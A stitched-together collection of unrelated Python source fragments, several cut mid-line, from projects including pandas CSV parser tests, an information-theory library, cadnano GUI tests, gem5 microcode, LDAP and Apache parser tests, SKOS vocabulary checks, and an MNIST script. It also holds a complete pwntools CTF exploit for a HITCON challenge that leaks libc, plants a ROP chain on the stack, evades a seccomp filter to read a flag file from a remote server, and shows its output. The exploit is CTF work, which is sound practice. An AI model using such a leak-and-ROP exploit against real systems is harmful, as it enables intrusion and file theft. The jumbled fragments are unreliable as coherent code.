TextIOWrapper(data, encoding=encoding) else: data = StringIO(data) result = parser.read_csv(data, index_col=0, sep=None, skiprows=2, encoding=encoding) expected = DataFrame( [[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"], index=Index(["foo", "bar", "baz"], name="index"), ) tm.assert_frame_equal(result, expected) def test_single_line(python_parser_only): # see gh-6607: sniff separator parser = python_parser_only result = parser.read_csv(StringIO("1,2"), names=["a", "b"], header=None, sep=None) expected = DataFrame({"a": [1], "b": [2]}) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("kwargs", [{"skipfooter": 2}, {"nrows": 3}]) def test_skipfooter(python_parser_only, kwargs): # see gh-6607 data = """A,B,C 1,2,3 4,5,6 7,8,9 want to skip this also also skip this """ parser = python_parser_only result = parser.read_csv(StringIO(data), **kwargs) expected = DataFrame([[1, 2, 3], [4, 5, 6], [7, 8, 9]], columns=["A", "B", "C"]) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize( "compression,klass", [("gzip", "GzipFile"), ("bz2", "BZ2File")] ) def test_decompression_regex_sep(python_parser_only, csv1, compression, klass): # see gh-6607 parser = python_parser_only with open(csv1, "rb") as f: data = f.read() data = data.replace(b",", b"::") expected = parser.read_csv(csv1) module = pytest.importorskip(compression) klass = getattr(module, klass) with tm.ensure_clean() as path: tmp = klass(path, mode="wb") tmp.write(data) tmp.close() result = parser.read_csv(path, sep="::", compression=compression) tm.assert_frame_equal(result, expected) def test_read_csv_buglet_4x_multi_index(python_parser_only): # see gh-6607 data = """ A B C D E one two three four a b 10.0032 5 -0.5109 -2.3358 -0.4645 0.05076 0.3640 a q 20 4 0.4473 1.4152 0.2834 1.00661 0.1744 x q 30 3 -0.6662 -0.5243 -0.3580 0.89145 2.5838""" parser = python_parser_only expected = DataFrame( [ [-0.5109, -2.3358, -0.4645, 0.05076, 0.3640], [0.4473, 1.4152, 0.2834, 1.00661, 0.1744], [-0.6662, -0.5243, -0.3580, 0.89145, 2.5838], ], columns=["A", "B", "C", "D", "E"], index=MultiIndex.from_tuples( [("a", "b", 10.0032, 5), ("a", "q", 20, 4), ("x", "q", 30, 3)], names=["one", "two", "three", "four"], ), ) result = parser.read_csv(StringIO(data), sep=r"\s+") tm.assert_frame_equal(result, expected) def test_read_csv_buglet_4x_multi_index2(python_parser_only): # see gh-6893 data = " A B C\na b c\n1 3 7 0 3 6\n3 1 4 1 5 9" parser = python_parser_only expected = DataFrame.from_records( [(1, 3, 7, 0, 3, 6), (3, 1, 4, 1, 5, 9)], columns=list("abcABC"), index=list("abc"), ) result = parser.read_csv(StringIO(data), sep=r"\s+") tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("add_footer", [True, False]) def test_skipfooter_with_decimal(python_parser_only, add_footer): # see gh-6971 data = "1#2\n3#4" parser = python_parser_only expected = DataFrame({"a": [1.2, 3.4]}) if add_footer: # The stray footer line should not mess with the # casting of the first two lines if we skip it. kwargs = {"skipfooter": 1} data += "\nFooter" else: kwargs = {} result = parser.read_csv(StringIO(data), names=["a"], decimal="#", **kwargs) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize( "sep", ["::", "#####", "!!!", "123", "#1!c5", "%!c!d", "@@#4:2", "_!pd#_"] ) @pytest.mark.parametrize( "encoding", ["utf-16", "utf-16-be", "utf-16-le", "utf-32", "cp037"] ) def test_encoding_non_utf8_multichar_sep(python_parser_only, sep, encoding): # see gh-3404 expected = DataFrame({"a": [1], "b": [2]}) parser = python_parser_only data = "1" + sep + "2" encoded_data = data.encode(encoding) result = parser.read_csv( BytesIO(encoded_data), sep=sep, names=["a", "b"], encoding=encoding ) tm.assert_frame_equal(result, expected) @pytest.mark.parametrize("quoting", [csv.QUOTE_MINIMAL, csv.QUOTE_NONE]) def test_multi_char_sep_quotes(python_parser_only, quoting): # see gh-13374 kwargs = {"sep": ",,"} parser = python_parser_only da
ta = 'a,,b\n1,,a
\n2,,"2,,b"' if quoting == csv.QUOTE_NONE: msg = "Expected 2 fields in line 3, saw 3" with pytest.raises(ParserError, match=msg): parser.read_csv(StringIO(data), quoting=quoting, **kwargs) else: msg = "ignored when a multi-char delimiter is used" with pytest.raises(ParserError, match=msg): parser.read_csv(StringIO(data), quoting=quoting, **kwargs) def test_none_delimiter(python_parser_only, capsys): # see gh-13374 and gh-17465 parser = python_parser_only data = "a,b,c\n0,1,2\n3,4,5,6\n7,8,9" expected = DataFrame({"a": [0, 7], "b": [1, 8], "c": [2, 9]}) # We expect the third line in the data to be # skipped because it is malformed, but we do # not expect any errors to occur. result = parser.read_csv(StringIO(data), header=0, sep=None, on_bad_lines="warn") tm.assert_frame_equal(result, expected) captured = capsys.readouterr() assert "Skipping line 3" in captured.err @pytest.mark.parametrize("data", ['a\n1\n"b"a', 'a,b,c\ncat,foo,bar\ndog,foo,"baz']) @pytest.mark.parametrize("skipfooter", [0, 1]) def test_skipfooter_bad_row(python_p
""" The I_downarrow unique measure, proposed by Griffith et al, and shown to be inconsistent. The idea is to measure unique information as the intrinsic mutual information between and source and the target, given the other sources. It turns out that these unique values are inconsistent, in that they produce differing redundancy values. """ from ..pid import BaseUniquePID from ...multivariate.secret_key_agreement import ( no_communication_skar, one_way_skar, two_way_skar, ) from ...utils import flatten __all__ = ( 'PID_SKAR_nw', 'PID_SKAR_owa', 'PID_SKAR_owb', 'PID_SKAR_tw', ) class PID_SKAR_nw(BaseUniquePID): """ The two-way secret key agreement rate partial information decomposition. Notes ----- This method progressively utilizes better bounds on the SKAR, and if even when using the tightest bounds does not result in a singular SKAR, nan is returned. """ _name = "I_>-<" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 >-< Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_nw : dict The value of I_SKAR_nw for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = no_communication_skar(d, source, target, others) return uniques class PID_SKAR_owa(BaseUniquePID): """ The one-way secret key agreement rate partial information decomposition, source to target. """ _name = "I_>->" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 >-> Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_owa : dict The value of I_SKAR_owa for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = one_way_skar(d, source, target, others) return uniques class PID_SKAR_owb(BaseUniquePID): """ The one-way secret key agreement rate partial information decomposition, target to source. """ _name = "I_<-<" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 <-< Y || X_1). Parameters ---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_skar_owb : dict The value of I_SKAR_owb for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = one_way_skar(d, target, source, others) return uniques class PID_SKAR_tw(BaseUniquePID): """ The two-way secret key agreement rate partial information decomposition. Notes ----- This method progressively utilizes better bounds on the SKAR, and if even when using the tightest bounds does not result in a singular SKAR, nan is returned. """ _name = "I_<->" @staticmethod def _measure(d, sources, target, niter=25, bound=None): """ This computes unique information as S(X_0 <-> Y || X_1), when possible. Parameters
---------- d : Distribution The distribution to compute I_SKAR for. sources : iterable of iterables The source variables. target : iterable The target variable. Returns ------- i_sk
ar_tw : dict The value of I_SKAR_tw for each individual source. """ uniques = {} for source in sources: others = list(sources) others.remove(source) others = list(flatten(others)) uniques[source] = two_way_skar(d, [source, target], others) return uniques
# To run: # pytest -c cadnano/tests/pytestgui.ini cadnano/tests/ import pytest from PyQt5.QtCore import Qt, QPointF from PyQt5.QtTest import QTest from cadnano.fileio.lattice import HoneycombDnaPart from cadnano.views.sliceview import slicestyles from cnguitestcase import GUITestApp @pytest.fixture() def cnapp(): app = GUITestApp() yield app app.tearDown() DELAY = 5 # milliseconds RADIUS = slicestyles.SLICE_HELIX_RADIUS ####################### Standard Functional Tests ######################## def testCreateVirtualHelixGui(cnapp): """Create some VHs""" # Create a new Honeycomb part toolbar = cnapp.window.
main_toolbar action_new_honeycomb = toolbar.widgetForAction(cnapp.window.action_new_dnapart_honeycomb) QTest.mouseClick(action_new_honeycomb, Qt.LeftButton, delay=DELAY) slicerootitem = cnapp.window.views['slice'].root_item assert len(slicerootitem.instance_items) == 1 slice_part_item = list(slicerootitem.instance_items.values())[0] QTest.keyClick(cnapp.window, Qt.Key_H, delay=DELAY) QTest.keyClick(cnapp.window
, Qt.Key_C, delay=DELAY) cnapp.processEvents() cmd_count = 1 # already added the part for row in range(-2, 2): for col in range(-2, 2): # print(row, col) x, y = HoneycombDnaPart.latticeCoordToModelXY(RADIUS, row, col) pt = QPointF(x, y) cnapp.graphicsItemClick(slice_part_item, Qt.LeftButton, pos=pt, delay=DELAY) cmd_count += 1 cnapp.processEvents() vh_count = len(cnapp.document.activePart().getidNums()) # undo and redo all for i in range(cmd_count): cnapp.document.undoStack().undo() cnapp.processEvents() for i in range(cmd_count): cnapp.document.undoStack().redo() cnapp.processEvents() part = list(cnapp.document.children())[0] vh_count_after_redo = len(part.getidNums()) assert vh_count == vh_count_after_redo # import time # time.sleep(3) # end def
# Copyright (c) 2007-2008 The Hewlett-Packard Development Company # All rights reserved. # # The license below extends only to copyright in the software and shall # not be construed as granting a license to any other intellectual # property including but not limited to intellectual property relating # to a hardware implementation of the functionality of the software # licensed hereunder. You may use the software subject to the license # terms below provided that you ensure that this notice is replicated # unmodified and in its entirety in all distributions of the software, # modified or unmodified, in source code or in binary form. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer; # redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution; # neither the name of the copyright holders nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. # # Authors: Gabe Black microcode = ''' def macroop RET_NEAR { # Make the default data size of rets 64 bits in 64 bit mode .adjust_env oszIn64Override ld t1, ss, [1, t0, rsp] # Check address of return addi rsp, rsp, dsz wripi t1, 0 }; def macroop RET_NEAR_I { # Make the default data size of rets 64 bits in 64 bit mode .adjust_env oszIn64Override limm t2, imm ld t1, ss, [1, t0, rsp] # Check address of return addi rsp, rsp, dsz add rsp, rsp, t2 wripi t1, 0 }; def macroop RET_FAR { .adjust_env oszIn64Override # Get the return RIP ld t1, ss, [1, t0, rsp] # Get the return CS ld t2, ss, [1, t0, rsp], ssz # Get the rpl andi t3, t2, 0x3 # Get the cpl # Here we'd check if we're changing priviledge levels. We'll just hope # that doesn't happen yet. # Do stuff if they're equal andi t0, t2, 0xFC, flags=(EZF,), dataSize=2 br label("processDescriptor"), flags=(CEZF,) andi t3, t2, 0xF8, dataSize=8 andi t0, t2, 0x4, flags=(EZF,), dataSize=2 br label("globalDescriptor"), flags=(CEZF,) ld t3, tsl, [1, t0, t3], dataSize=8 br label("processDescriptor") globalDescriptor:
ld t3, tsg, [1, t0, t3], dataSize=8 processDescriptor: chks t2, t3, IretCheck, dataSize=8 # There should be validity checks on the RIP checks here, but I'll do # that later. wrdl cs, t3, t2 wrsel
cs, t2 wrip t0, t1 br label("end") # Do other stuff if they're not. end: fault "NoFault" }; '''
import unittest from plow.ldapadaptor import LdapAdaptor class FakeLA(LdapAdaptor): def bind(self, *args): """ Nothing to see here move along """ initialize = bind class Test_Ldap_DN_Compare(unittest.TestCase): def setUp(self): self.ldap_case_i = FakeLA("uri", "base", case_insensitive_dn=True) self.ldap_case_s = FakeLA("uri", "base") def _do_compare(self, ref, other, res, case_sensitive=True
): if case_sensitive: match = self.ldap_case_s.compare_dn(ref, other) else: match = self.ldap_case_i.compare_dn(ref, other) if res: self.assertTrue( match, "Expected '{0}' to match '{1}' (Case Sensitive: {2})".format(ref, other, case_sensitive),
) else: self.assertFalse( match, "'{0}' and '{1}' should not match (Case Sensitive: {2})".format(ref, other, case_sensitive), ) def test_basic(self): self._do_compare("CN=Test", "CN=test", False, case_sensitive=True) self._do_compare("CN=Test", "CN=test", True, case_sensitive=False) def test_spaces(self): self._do_compare("CN=Test, OU=Base", "CN=Test,OU=Base", True) self._do_compare(" CN = Test,OU = Base ", "CN=Test,OU=Base", True) self._do_compare(" CN = Te st ", "CN=Te st", True) if __name__ == '__main__': unittest.main()
# Script used to create Mni
st_mini and Mnist_full datasets. import numpy as np from sklearn.datasets import fetch_mldata from pandas import DataFrame # Default download location for caching is # ~/scikit_learn_data/mldata/mnist-original.mat unless specified otherwise. mnist = fetch_mldata('MNIST original') # Create DataFrame, group data by class. df = DataFrame(mnist.data) df['class'] = mnist.target grouped = df.groupby('class') # Write data feature values to file in Dataset directory by class. for name, group in grouped: # Create mini binary MNIST classification dataset for faster testing. if int(name) < 2: fname = 'Dataset/Mnist_mini/Class' + str(int(name)) + '.txt' np.savetxt(fname=fname, X=group[:200], fmt='%d',delimiter='\t',newline='\n') # Create full MNIST classification for full application. fname = 'Dataset/Mnist_full/Class' + str(int(name)) + '.txt' np.savetxt(fname=fname, X=group, fmt='%d', delimiter='\t', newline='\n')
les, status) status[node] = 2 # set this node as completed elif status.get(node) == 1: # has been entered but not yet done if break_cycles: logging.warning("Hierarchy cycle removed at %s -> %s", localname(parent), localname(node)) rdf.remove((node, SKOS.broader, parent)) rdf.remove((node, SKOS.broaderTransitive, parent)) rdf.remove((node, SKOSEXT.broaderGeneric, parent)) rdf.remove((node, SKOSEXT.broaderPartitive, parent)) rdf.remove((parent, SKOS.narrower, node)) rdf.remove((parent, SKOS.narrowerTransitive, node)) else: logging.warning( "Hierarchy cycle detected at %s -> %s, " "but not removed because break_cycles is not active", localname(parent), localname(node)) elif status.get(node) == 2: # is completed already pass def hierarchy_cycles(rdf, fix=False): """Check if the graph contains skos:broader cycles and optionally break these. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing any skos:broader that overlaps with skos:broaderTransitive. """ top_concepts = sorted(rdf.subject_objects(SKOS.hasTopConcept)) status = {} for cs, root in top_concepts: _hierarchy_cycles_visit( rdf, root, None, fix, status=status) # double check that all concepts were actually visited in the search, # and visit remaining ones if necessary recheck_top_concepts = False for conc in sorted(rdf.subjects(RDF.type, SKOS.Concept)): if conc not in status: recheck_top_concepts = True _hierarchy_cycles_visit( rdf, conc, None, fix, status=status) return recheck_top_concepts def disjoint_relations(rdf, fix=False): """Check if the graph contains concepts connected by both of the semantically disjoint semantic skos:related and skos:broaderTransitive (S27), and optionally remove the involved skos:related relations. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing skos:related relations that overlap with skos:broaderTransitive. """ for conc1, conc2 in sorted(rdf.subject_objects(SKOS.related)): if conc2 in sorted(rdf.transitive_objects(conc1, SKOS.broader)): if fix: logging.warning( "Concepts %s and %s connected by both " "skos:broaderTransitive and skos:related, " "removing skos:related", conc1, conc2) rdf.remove((conc1, SKOS.related, conc2)) rdf.remove((conc2, SKOS.related, conc1)) else: logging.warning( "Concepts %s and %s connected by both " "skos:broaderTransitive and skos:related, " "but keeping it because keep_related is enabled", conc1, conc2) def hierarchical_redundancy(rdf, fix=False): """Check for and optionally remove extraneous skos:broader relations. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing skos:broader relations between concepts that are otherwise connected by skos:broaderTransitive. """ for conc, parent1 in sorted(rdf.subject_objects(SKOS.broader)): for parent2 in sorted(rdf.objects(conc, SKOS.broader)): if parent1 == parent2: continue # must be different if parent2 in rdf.transitive_objects(parent1, SKOS.broader): if fix: logging.warning( "Eliminating redundant hierarchical relationship: " "%s skos:broader %s", conc, parent2) rdf.remove((conc, SKOS.broader, parent2)) rdf.remove((conc, SKOS.broaderTransitive, parent2)) rdf.remove((parent2, SKOS.narrower, conc)) rdf.remove((parent2, SKOS.narrowerTransitive, conc)) else: logging.warning( "Redundant hierarchical relationship " "%s skos:broader %s found, but not eliminated " "because eliminate_redundancy is not set", conc, parent2) def preflabel_uniqueness(rdf, policy='all'): """Check that concepts have no more than one value of skos:prefLabel per language tag (S14), and optionally move additional values to skos:altLabel. :param Graph rdf: An rdflib.graph.Graph object. :param str policy: Policy for deciding which value to keep as prefLabel when multiple prefLabels are found. Possible values are 'shortest' (keep the shortest label), 'longest' (keep the longest label), 'uppercase' (prefer uppercase), 'lowercase' (prefer uppercase) or 'all' (keep all, just log the problems). Alternatively, a list of policies to apply in order, such as ['shortest', 'lowercase'], may be used. """ resources = set( (res for res, label in rdf.subject_objects(SKOS.prefLabel))) policy_fn = { 'shortest': len, 'longest': lambda x: -len(x), 'uppercase': lambda x: int(x[0].islower()), 'lowercase': lambda x: int(x[0].isupper()) } if type(policy) not in (list, tuple): policies = policy.split(',') else: policies = policy for p in policies: if p not in policy_fn: logging.critical("Unknown preflabel-policy: %s", policy) return def key_fn(label): return [policy_fn[p](label) for p in policies] + [str(label)] for res in sorted(resources): prefLabels = {} for label in rdf.objects(res, SKOS.prefLabel): lang = label.langua
ge if lang not in prefLabels: prefLabels[lang] = [] prefLabels[lang].append(label) for lang, labels in prefLabels.items(): if len(labels) > 1: if policies[0] == 'all': logging.warning( "Resource %s has
more than one prefLabel@%s, " "but keeping all of them due to preflabel-policy=all.", res, lang) continue chosen = sorted(labels, key=key_fn)[0] logging.warning( "Resource %s has more than one prefLabel@%s: " "choosing %s (policy: %s)", res, lang, chosen, str(policy)) for label in labels: if label != chosen: rdf.remove((res, SKOS.prefLabel, label)) rdf.add((res, SKOS.altLabel, label)) def label_overlap(rdf, fix=False): """Check if concepts have the same value for any two of the pairwise disjoint properties skos:prefLabel, skos:altLabel and skos:hiddenLabel (S13), and optionally remove the least significant property. :param Graph rdf: An rdflib.graph.Graph object. :param bool fix: Fix the problem by removing the least significant property (altLabel or hiddenLabel). """ def label_warning(res, label, keep, remove): if fix: logging.warning( "Resource %s has '%s'@%s as both %s and %s; removing %s", res, label, label.language, keep, remove, remove ) else: logging.warning( "Resource %s has '%s'@%s as both %s and %s", res, label, label.language, keep, remove ) for res, label in find_prop_overlap(rdf, SKOS.prefLabel, SKOS.altLabel): label_warning(res, label, 'prefLabel', 'altLabel') if fix: rdf.remove((res, SKOS.altLabel, label)) for res, label in find_prop_overlap(rdf, SKOS.prefLabel, SKOS.hiddenLabel): label_warning(res, label, 'prefLabel', 'hiddenLabel') if fix:
#!/usr/bin/env python2 # -*- coding: utf-8 -*- from pwn import * context(arch='amd64', os='linux', aslr=False, terminal=['tmux', 'neww']) env = {'LD_PRELOAD': './libc.so.6'} if args['GDB']: io = gdb.debug( './artifact-amd64-2.24-9ubuntu2.2', env=env, gdbscript='''\ set follow-fork-mode parent b *0x555555554ba6 c ''') elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') elif args['REMOTE']: io = remote('52.192.178.153', 31337) elf, libc = ELF('./artifact'), ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') else: io = process('./artifact-amd64-2.24-9ubuntu2.2', env=env) elf, libc = io.elf, ELF('libs/amd64/2.24/9ubuntu2.2/libc-2.24.so') # the binary allows reading and writing to arbitrary locations # the tricky part was finding how to bypass the seccomp rules # enforced with prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...), since # the "official" tool to disassemble BPF bytecode provided by libseccomp doesn't handle # the BPF_X opcode correctly (and shows wrong rules) # luckily, https://github.com/niklasb/dump-seccomp seems to extract the correct rules: # prctl(PR_SET_NO_NEW_PRIVS) # prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, ...) # fprog @ 00007fffffffdd70 # 20 blocks @ 00007fffffffdd80 # Disassembly: # l0: ld [4] # l1: jeq #0xc000003e, l2, l18 # l2: ld [32] # l3: tax # l4: ld [0] # l5: jeq #0, l19, l6 # l6: jeq #0x1, l19, l7 # l7: jeq #0x5, l19, l8 # l8: jeq #0x8, l19, l9 # l9: jeq #0x9, l11, l10 # l10: jeq #0xa, l11, l14 # l11: txa # l12: and #0x1 # l13: jeq #0x1, l18, l19 # l14: jeq x, l19, l15 # l15: jeq #0xc, l19, l16 # l16: jeq #0x3c, l19, l17 # l17: jeq #0xe7, l19, l18 # l18: ret #0 # l19: ret #0x7fff0000 # at l14, syscalls in which rax == rdx are allowed to run: this means # we can execute open(..., ..., 2) # find the address of libc io.recvuntil('Choice?\n') io.sendline('1') io.recvuntil('Idx?\n') index = 0x650 / 8 + 1 io.sendline(str(index)) a_libc_address = int(io.recvline()[len('Here it is: '):]) libc.address = a_libc_address - 0x0000000000020300 - 241 success('libc.address: %s' % hex(libc.address)) # find any writeable location buf = libc.address + 0x3c1800 # read a filename into buf, open the file, read its content and write it back rop = ROP(libc) rop.read(0, buf, 5) rop.open(buf, 0, 2) rop.read(3, buf, 50) rop.write(1, buf, 50) # set up the ROP chain in the stack raw_rop = str(rop) for i, address in enumerate([u64(raw_rop[i:i + 8]) for i in range(0, len(raw_rop), 8)]): print 'Sending', i io.recvuntil('Choice?\n') io.sendline('2') io.recvuntil('Idx?\n') index = 0x650 / 8 + 1 + i io.sendline(str(index)) io.recvuntil('Give me your number:\n') io.sendline(str(address)) # exit to trigger ROP execution io.recvuntil('Choice?\n') io.sendline('3') sleep(0.1) io.send('flag\x00') io.interactive()
# $ ./artifact.py REMOTE # [+] Opening connection to 52.192.178.153 on port 31337: Done # [*] '/home/ubuntu/
vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/artifact' # Arch: amd64-64-little # RELRO: Full RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [*] '/home/ubuntu/vbox/artifact-4c4375825c4a08ae9d14492b34b3bddd/libc.so.6' # Arch: amd64-64-little # RELRO: Partial RELRO # Stack: Canary found # NX: NX enabled # PIE: PIE enabled # [+] libc.address: 0x7fed4d6ab000 # [*] Loaded cached gadgets for './libc.so.6' # Sending 0 # Sending 1 # . . . # Sending 30 # Sending 31 # [*] Switching to interactive mode # hitcon{why_libseccomp_cheated_me_Q_Q}
r letsencrypt_apache.parser.""" import os import shutil import unittest import augeas import mock from letsencrypt import errors from letsencrypt_apache.tests import util class BasicParserTest(util.ParserTest): """Apache Parser Test.""" def setUp(self): # pylint: disable=arguments-differ super(BasicParserTest, self).setUp() def tearDown(self): shutil.rmtree(self.temp_dir) shutil.rmtree(self.config_dir) shutil.rmtree(self.work_dir) def test_find_config_root_no_root(self): # pylint: disable=protected-access os.remove(self.parser.loc["root"]) self.assertRaises( errors.NoInstallationError, self.parser._find_config_root) def test_parse_file(self): """Test parse_file. letsencrypt.conf is chosen as the test file as it will not be included during the normal course of execution. """ file_path = os.path.join( self.config_path, "not-parsed-by-default", "letsencrypt.conf") self.parser._parse_file(file_path) # pylint: disable=protected-access # search for the httpd incl matches = self.parser.aug.match( "/augeas/load/Httpd/incl [. ='%s']" % file_path) self.assertTrue(matches) def test_find_dir(self): test = self.parser.find_dir("Listen", "80") # This will only look in enabled hosts test2 = self.parser.fi
nd_dir("documentroot") self.assertEqual(len(test), 1) self.assertEqual(len(test2), 4) def test_add_dir(self): aug_default = "/files" + self.parser.loc["default"]
self.parser.add_dir(aug_default, "AddDirective", "test") self.assertTrue( self.parser.find_dir("AddDirective", "test", aug_default)) self.parser.add_dir(aug_default, "AddList", ["1", "2", "3", "4"]) matches = self.parser.find_dir("AddList", None, aug_default) for i, match in enumerate(matches): self.assertEqual(self.parser.aug.get(match), str(i + 1)) def test_add_dir_to_ifmodssl(self): """test add_dir_to_ifmodssl. Path must be valid before attempting to add to augeas """ from letsencrypt_apache.parser import get_aug_path # This makes sure that find_dir will work self.parser.modules.add("mod_ssl.c") self.parser.add_dir_to_ifmodssl( get_aug_path(self.parser.loc["default"]), "FakeDirective", ["123"]) matches = self.parser.find_dir("FakeDirective", "123") self.assertEqual(len(matches), 1) self.assertTrue("IfModule" in matches[0]) def test_add_dir_to_ifmodssl_multiple(self): from letsencrypt_apache.parser import get_aug_path # This makes sure that find_dir will work self.parser.modules.add("mod_ssl.c") self.parser.add_dir_to_ifmodssl( get_aug_path(self.parser.loc["default"]), "FakeDirective", ["123", "456", "789"]) matches = self.parser.find_dir("FakeDirective") self.assertEqual(len(matches), 3) self.assertTrue("IfModule" in matches[0]) def test_get_aug_path(self): from letsencrypt_apache.parser import get_aug_path self.assertEqual("/files/etc/apache", get_aug_path("/etc/apache")) def test_set_locations(self): with mock.patch("letsencrypt_apache.parser.os.path") as mock_path: mock_path.isfile.side_effect = [False, False] # pylint: disable=protected-access results = self.parser._set_locations() self.assertEqual(results["default"], results["listen"]) self.assertEqual(results["default"], results["name"]) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_update_runtime_variables(self, mock_cfg): mock_cfg.return_value = ( 'ServerRoot: "/etc/apache2"\n' 'Main DocumentRoot: "/var/www"\n' 'Main ErrorLog: "/var/log/apache2/error.log"\n' 'Mutex ssl-stapling: using_defaults\n' 'Mutex ssl-cache: using_defaults\n' 'Mutex default: dir="/var/lock/apache2" mechanism=fcntl\n' 'Mutex watchdog-callback: using_defaults\n' 'PidFile: "/var/run/apache2/apache2.pid"\n' 'Define: TEST\n' 'Define: DUMP_RUN_CFG\n' 'Define: U_MICH\n' 'Define: TLS=443\n' 'Define: example_path=Documents/path\n' 'User: name="www-data" id=33 not_used\n' 'Group: name="www-data" id=33 not_used\n' ) expected_vars = {"TEST": "", "U_MICH": "", "TLS": "443", "example_path": "Documents/path"} self.parser.update_runtime_variables() self.assertEqual(self.parser.variables, expected_vars) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_update_runtime_vars_bad_output(self, mock_cfg): mock_cfg.return_value = "Define: TLS=443=24" self.parser.update_runtime_variables() mock_cfg.return_value = "Define: DUMP_RUN_CFG\nDefine: TLS=443=24" self.assertRaises( errors.PluginError, self.parser.update_runtime_variables) @mock.patch("letsencrypt_apache.constants.os_constant") @mock.patch("letsencrypt_apache.parser.subprocess.Popen") def test_update_runtime_vars_bad_ctl(self, mock_popen, mock_const): mock_popen.side_effect = OSError mock_const.return_value = "nonexistent" self.assertRaises( errors.MisconfigurationError, self.parser.update_runtime_variables) @mock.patch("letsencrypt_apache.parser.subprocess.Popen") def test_update_runtime_vars_bad_exit(self, mock_popen): mock_popen().communicate.return_value = ("", "") mock_popen.returncode = -1 self.assertRaises( errors.MisconfigurationError, self.parser.update_runtime_variables) class ParserInitTest(util.ApacheTest): def setUp(self): # pylint: disable=arguments-differ super(ParserInitTest, self).setUp() self.aug = augeas.Augeas( flags=augeas.Augeas.NONE | augeas.Augeas.NO_MODL_AUTOLOAD) def tearDown(self): shutil.rmtree(self.temp_dir) shutil.rmtree(self.config_dir) shutil.rmtree(self.work_dir) @mock.patch("letsencrypt_apache.parser.ApacheParser._get_runtime_cfg") def test_unparsable(self, mock_cfg): from letsencrypt_apache.parser import ApacheParser mock_cfg.return_value = ('Define: TEST') self.assertRaises( errors.PluginError, ApacheParser, self.aug, os.path.relpath(self.config_path), "/dummy/vhostpath", version=(2, 2, 22)) def test_root_normalized(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.ApacheParser." "update_runtime_variables"): path = os.path.join( self.temp_dir, "debian_apache_2_4/////multiple_vhosts/../multiple_vhosts/apache2") parser = ApacheParser(self.aug, path, "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) def test_root_absolute(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.ApacheParser." "update_runtime_variables"): parser = ApacheParser( self.aug, os.path.relpath(self.config_path), "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) def test_root_no_trailing_slash(self): from letsencrypt_apache.parser import ApacheParser with mock.patch("letsencrypt_apache.parser.ApacheParser." "update_runtime_variables"): parser = ApacheParser( self.aug, self.config_path + os.path.sep, "/dummy/vhostpath") self.assertEqual(parser.root, self.config_path) if __name__ == "__main__": unittest.main() # pra
